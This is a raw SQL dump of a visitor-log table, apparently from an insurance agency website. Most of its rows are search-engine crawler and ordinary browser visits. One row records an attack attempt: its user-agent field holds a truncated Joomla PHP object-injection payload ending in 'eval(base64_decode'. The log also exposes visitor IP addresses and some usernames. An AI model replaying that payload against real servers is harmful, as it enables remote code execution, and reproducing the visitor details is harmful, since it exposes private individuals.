+http://www.linkpad.ru)','','',0,'','','ru','','','','','','','0','0',0),(16778,'0b_e18bb287a25d8656ee0159ef2579789c','1460495508','5.79.68.56','5.79.68.56','/contact/','Mozilla/5.0 (compatible; LinkpadBot/1.07; +http://www.linkpad.ru)','','',0,'','','ru','','','','','','','0','0',0),(16779,'0b_e18bb287a25d8656ee0159ef2579789c','1460495519','5.79.68.56','5.79.68.56','/case-status/','Mozilla/5.0 (compatible; LinkpadBot/1.07; +http://www.linkpad.ru)','','',0,'','','ru','','','','','','','0','0',0),(16781,'0b_e18bb287a25d8656ee0159ef2579789c','1460495531','5.79.68.56','5.79.68.56','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; LinkpadBot/1.07; +http://www.linkpad.ru)','','',0,'','','ru','','','','','','','0','0',0),(16782,'0b_e18bb287a25d8656ee0159ef2579789c','1460495542','5.79.68.56','5.79.68.56','/term-quotes/','Mozilla/5.0 (compatible; LinkpadBot/1.07; +http://www.linkpad.ru)','','',0,'','','ru','','','','','','','0','0',0),(16784,'0b_e18bb287a25d8656ee0159ef2579789c','1460495553','5.79.68.56','5.79.68.56','/about-us/','Mozilla/5.0 (compatible; LinkpadBot/1.07; +http://www.linkpad.ru)','','',0,'','','ru','','','','','','','0','0',0),(16787,'0b_e18bb287a25d8656ee0159ef2579789c','1460495565','5.79.68.56','5.79.68.56','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; LinkpadBot/1.07; +http://www.linkpad.ru)','','',0,'','','ru','','','','','','','0','0',0),(16788,'0b_6d04715b7948e76c7b63e85d1a04535e','1460495575','180.76.15.159','baiduspider-180-76-15-159.crawl.baidu.com','/forms/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(16791,'0b_e18bb287a25d8656ee0159ef2579789c','1460495576','5.79.68.56','5.79.68.56','/insentives/','Mozilla/5.0 (compatible; LinkpadBot/1.07; +http://www.linkpad.ru)','','',0,'','','ru','','','','','','','0','0',0),(16794,'0b_e18bb287a25d8656ee0159ef2579789c','1460495587','5.79.68.56','5.79.68.56','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; LinkpadBot/1.07; +http://www.linkpad.ru)','','',0,'','','ru','','','','','','','0','0',0),(16796,'0b_e18bb287a25d8656ee0159ef2579789c','1460495599','5.79.68.56','5.79.68.56','/agent-tools/','Mozilla/5.0 (compatible; LinkpadBot/1.07; +http://www.linkpad.ru)','','',0,'','','ru','','','','','','','0','0',0),(16799,'0b_e18bb287a25d8656ee0159ef2579789c','1460495611','5.79.68.56','5.79.68.56','/licensing-contracting/','Mozilla/5.0 (compatible; LinkpadBot/1.07; +http://www.linkpad.ru)','','',0,'','','ru','','','','','','','0','0',0),(16800,'0b_c7a617ba5f9604c35f57d8461164372b','1460497378','91.79.1.104','ppp91-79-1-104.pppoe.mtu-net.ru','/','Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36','http://empireins.com/','',0,'Win8','Chrome 39','ru','','','','','','','0','0',0),(16802,'0b_c7a617ba5f9604c35f57d8461164372b','1460497382','91.79.1.104','ppp91-79-1-104.pppoe.mtu-net.ru','/contact/','Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36','http://www.empireins.com/contact/','',0,'Win8','Chrome 39','ru','','','','','','','0','0',0),(16805,'0b_c7a617ba5f9604c35f57d8461164372b','1460497384','91.79.1.104','ppp91-79-1-104.pppoe.mtu-net.ru','/contact/index.php','Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36','http://www.empireins.com/index.php','',0,'Win8','Chrome 39','ru','','','','','','','0','0',0),(16806,'0b_d053d42985bb0b5543c649d8cbcfb9d0','1460499252','66.249.64.24','crawl-66-249-64-24.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(16809,'0b_d053d42985bb0b5543c649d8cbcfb9d0','1460499264','66.249.64.29','crawl-66-249-64-29.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(16811,'0b_2846e180bc4c2ac4c0f56b2387b35ea9','1460499806','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(16812,'0b_2846e180bc4c2ac4c0f56b2387b35ea9','1460499808','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(16815,'0b_18df0a46cfb45b8da6fc618ffdeed726','1460501061','216.81.71.84','216.81.71.84','/','=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16','','',0,'Win7','','','','','','','','','0','0',0),(16817,'0b_f977de6d7e635f739b4147b2c879d9d6','1460503212','107.21.1.8','ec2-107-21-1-8.compute-1.amazonaws.com','/','Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)','http://www.empireins.com/','',0,'','','us','','','','','','','0','0',0),(16820,'0b_d3726da347a997bed0d1938d5c6c7f44','1460505135','192.187.114.11','push-router.cakestandchar.net','/','}__test|O:21:\\\"JDatabaseDriverMysqli\\\":3:{s:2:\\\"fc\\\";O:17:\\\"JSimplepieFactory\\\":0:{}s:21:\\\"\\\\0\\\\0\\\\0disconnectHandlers\\\";a:1:{i:0;a:2:{i:0;O:9:\\\"SimplePie\\\":5:{s:8:\\\"sanitize\\\";O:20:\\\"JDatabaseDriverMysql\\\":0:{}s:8:\\\"feed_url\\\";s:3738:\\\"eval(base64_decode','','',0,'','','','','','Feed Reader','feed reader','','','0','0',0),(16823,'0b_b02d83cceedefa32c3facf42720db9de','1460507054','157.55.39.176','msnbot-157-55-39-176.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16826,'0b_46076700fe250ccf222602b44d4b8c41','1460510250','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(16827,'0b_46076700fe250ccf222602b44d4b8c41','1460510261','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(16830,'0b_46076700fe250ccf222602b44d4b8c41','1460510275','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(16832,'0b_46076700fe250ccf222602b44d4b8c41','1460510336','50.108.156.48','50.108.156.48','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(16835,'0b_98a5f294d5cd366a14e3a351cef727b7','1460511215','180.76.15.145','baiduspider-180-76-15-145.crawl.baidu.com','/igo/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(16836,'0b_9c784ed94ac5660dc80d9ef15b54ed05','1460513225','180.76.15.26','baiduspider-180-76-15-26.crawl.baidu.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(16838,'0b_38f1b8ea5fbe208d63d4497c0c4edd15','1460517886','66.249.64.24','crawl-66-249-64-24.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(16841,'0b_a04228370524b1483515b1dd87af36cc','1460520757','157.55.39.176','msnbot-157-55-39-176.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(16844,'0b_519d5d5ba0c0f4fbb6d8b56bd67cc96d','1460520825','157.55.39.210','msnbot-157-55-39-210.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(16847,'0b_eb1339c35b4b9be5d13ed250f8893185','1460521554','54.189.44.13','ec2-54-189-44-13.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1; http://spyonweb.com spyonweb@gmail.com','','',0,'Win7','','','','','Unknown Spider','','','','0','0',0),(16848,'0b_eb1339c35b4b9be5d13ed250f8893185','1460521556','54.189.44.13','ec2-54-189-44-13.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1; http://spyonweb.com spyonweb@gmail.com','','',0,'Win7','Google Chrome','','','','Unknown Spider','','','','0','0',0),(16851,'0b_9258638c2cad6ec36da4ac60d311fbdd','1460528915','66.249.64.34','crawl-66-249-64-34.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(16854,'0b_32393fd793edfd6d0cf4113234dcd940','1460529738','51.255.51.69','69.ip-51-255-51.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(16857,'0b_32393fd793edfd6d0cf4113234dcd940','1460529741','51.255.51.69','69.ip-51-255-51.eu','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(16860,'0b_a0bf57be9096fa658c4371801d122b16','1460532075','157.55.39.132','msnbot-157-55-39-132.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16863,'0b_68941b9a3a0f675d0f247312777dc7a1','1460533759','66.249.64.94','crawl-66-249-64-94.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(16865,'0b_68941b9a3a0f675d0f247312777dc7a1','1460533761','66.249.64.89','crawl-66-249-64-89.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(16868,'0b_a759601b2344d4d8faefee62d87f1264','1460536690','157.55.39.132','msnbot-157-55-39-132.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16869,'0b_a693530233c6c294a4ab36ee5b186919','1460537569','157.55.39.91','msnbot-157-55-39-91.search.msn.com','/sso/235_19.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16871,'0b_4aace0704735a0ea1d5edafe7e442b41','1460540462','23.81.207.253','23.81.207.253.rdns.as15003.net','/','Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36','','',0,'Win10','Chrome 40','','','','','','','','0','0',0),(16872,'0b_3fe475ea37820a516598dfcad8b6a433','1460541032','157.55.39.31','msnbot-157-55-39-31.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16874,'0b_aa47de7d53e74d3bedf244d92f7979dd','1460541053','157.55.39.132','msnbot-157-55-39-132.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16875,'0b_8cf46f05133815500a1d83b50682cc39','1460541785','157.55.39.91','msnbot-157-55-39-91.search.msn.com','/igo/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16878,'0b_96cf4c9a7dc898846dd8aa4b98a4293d','1460544201','151.80.40.50','ns3556902.ip-151-80-40.eu','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','eu','','','','','','','0','0',0),(16880,'0b_d96fd9fb473615fd3c239190b865582e','1460548545','157.55.39.31','msnbot-157-55-39-31.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16883,'0b_aff11c757ad1f513f0138ec8985710c1','1460549103','157.55.39.132','msnbot-157-55-39-132.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16886,'0b_41e1391c95887e50f82c835f2b7fad40','1460549385','157.55.39.210','msnbot-157-55-39-210.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16887,'0b_41e1391c95887e50f82c835f2b7fad40','1460549609','157.55.39.210','msnbot-157-55-39-210.search.msn.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16890,'0b_aff11c757ad1f513f0138ec8985710c1','1460550350','157.55.39.132','msnbot-157-55-39-132.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16892,'0b_41e1391c95887e50f82c835f2b7fad40','1460550417','157.55.39.210','msnbot-157-55-39-210.search.msn.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16893,'0b_41e1391c95887e50f82c835f2b7fad40','1460550492','157.55.39.210','msnbot-157-55-39-210.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16895,'0b_41e1391c95887e50f82c835f2b7fad40','1460550594','157.55.39.210','msnbot-157-55-39-210.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16896,'0b_edc56a54074def38e5cf2c00d60f7539','1460550833','157.55.39.132','msnbot-157-55-39-132.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16898,'0b_edc56a54074def38e5cf2c00d60f7539','1460550875','157.55.39.132','msnbot-157-55-39-132.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16899,'0b_edc56a54074def38e5cf2c00d60f7539','1460550877','157.55.39.132','msnbot-157-55-39-132.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16902,'0b_e5c5926eeafde69b17af1a02fe357e8a','1460551467','157.55.39.91','msnbot-157-55-39-91.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16905,'0b_edc56a54074def38e5cf2c00d60f7539','1460551550','157.55.39.132','msnbot-157-55-39-132.search.msn.com','/insentives/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16907,'0b_e5c5926eeafde69b17af1a02fe357e8a','1460551554','157.55.39.31','msnbot-157-55-39-31.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16910,'0b_e5c5926eeafde69b17af1a02fe357e8a','1460551597','157.55.39.91','msnbot-157-55-39-91.search.msn.com','/igo/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16911,'0b_3a306c1e90ed10b946d957654bf1d788','1460551624','157.55.39.210','msnbot-157-55-39-210.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16914,'0b_3a306c1e90ed10b946d957654bf1d788','1460551690','157.55.39.210','msnbot-157-55-39-210.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16916,'0b_e5c5926eeafde69b17af1a02fe357e8a','1460551712','157.55.39.31','msnbot-157-55-39-31.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16919,'0b_e5c5926eeafde69b17af1a02fe357e8a','1460551802','157.55.39.91','msnbot-157-55-39-91.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16922,'0b_e5c5926eeafde69b17af1a02fe357e8a','1460551803','157.55.39.91','msnbot-157-55-39-91.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16925,'0b_e5c5926eeafde69b17af1a02fe357e8a','1460551954','157.55.39.31','msnbot-157-55-39-31.search.msn.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16926,'0b_3a306c1e90ed10b946d957654bf1d788','1460552008','157.55.39.210','msnbot-157-55-39-210.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16928,'0b_e5c5926eeafde69b17af1a02fe357e8a','1460552019','157.55.39.91','msnbot-157-55-39-91.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16931,'0b_64c1a142ee4ebc07d95a887461a515b2','1460552963','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(16932,'0b_64c1a142ee4ebc07d95a887461a515b2','1460552965','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(16934,'0b_79cc7f2cc730f0bc2b4da1736dd9fd0a','1460552967','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(16935,'0b_79cc7f2cc730f0bc2b4da1736dd9fd0a','1460552968','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(16938,'0b_5feb09bae96c641ced3816c5d69bdcd4','1460553033','69.197.163.195','69.197.163.195','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','3','0',0),(16940,'0b_5feb09bae96c641ced3816c5d69bdcd4','1460553044','69.197.163.195','69.197.163.195','/?page_id=169','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','3','0',0),(16943,'0b_5feb09bae96c641ced3816c5d69bdcd4','1460553056','69.197.163.195','69.197.163.195','/register/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','3','0',0),(16946,'0b_5feb09bae96c641ced3816c5d69bdcd4','1460553068','69.197.163.195','69.197.163.195','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','3','0',0),(16947,'0b_64c1a142ee4ebc07d95a887461a515b2','1460553872','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(16949,'0b_f0218d8609fff62973bd944b033c30f0','1460554069','180.76.15.15','baiduspider-180-76-15-15.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(16952,'0b_95b468fb81e0391401adcc0507bc4edd','1460554315','157.55.39.132','msnbot-157-55-39-132.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16953,'0b_95b468fb81e0391401adcc0507bc4edd','1460554427','157.55.39.132','msnbot-157-55-39-132.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16956,'0b_68764c11dd11127f255e113b6a3d8e19','1460554814','24.185.84.115','ool-18b95473.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win8','Chrome 49','us','1920 x 1080','Google','','','','','0','0',0),(16959,'0b_68764c11dd11127f255e113b6a3d8e19','1460554818','24.185.84.115','ool-18b95473.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(16962,'0b_68764c11dd11127f255e113b6a3d8e19','1460554911','24.185.84.115','ool-18b95473.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win8','Chrome 49','us','1920 x 1080','Google','','','','','0','51',0),(16965,'0b_68764c11dd11127f255e113b6a3d8e19','1460554912','24.185.84.115','ool-18b95473.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(16968,'0b_68764c11dd11127f255e113b6a3d8e19','1460554952','24.185.84.115','ool-18b95473.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win8','Chrome 49','us','1920 x 1080','Google','','','','','0','51',0),(16971,'0b_68764c11dd11127f255e113b6a3d8e19','1460554953','24.185.84.115','ool-18b95473.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(16974,'0b_95b468fb81e0391401adcc0507bc4edd','1460555374','157.55.39.132','msnbot-157-55-39-132.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16976,'0b_64c1a142ee4ebc07d95a887461a515b2','1460556049','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(16979,'0b_64c1a142ee4ebc07d95a887461a515b2','1460556069','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carrier-field-underwriting-guides/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(16980,'0b_ba64e6acf383d49232bc5cdb37ff101e','1460556175','184.106.156.99','184.106.156.99','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(16982,'0b_64c1a142ee4ebc07d95a887461a515b2','1460556281','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/carrier-field-underwriting-guides/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(16985,'0b_64c1a142ee4ebc07d95a887461a515b2','1460556292','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/carrier-field-underwriting-guides/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(16986,'0b_64c1a142ee4ebc07d95a887461a515b2','1460556298','108.58.88.178','ool-6c3a58b2.static.optonline.net','/underwriting-cheat-sheets/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(16989,'0b_4483b846ca2c1fe82308f06cabe5165a','1460556364','148.159.128.51','148.159.128.51','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.82 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 48','us','1920 x 1080','Google','','','','','0','0',0),(16992,'0b_2ddd50b7f0e272d7d49b83b898653660','1460556395','148.159.128.51','148.159.128.51','/feed/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','','','','','0','0',0),(16995,'0b_2ddd50b7f0e272d7d49b83b898653660','1460556416','148.159.128.51','148.159.128.51','/comments/feed/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 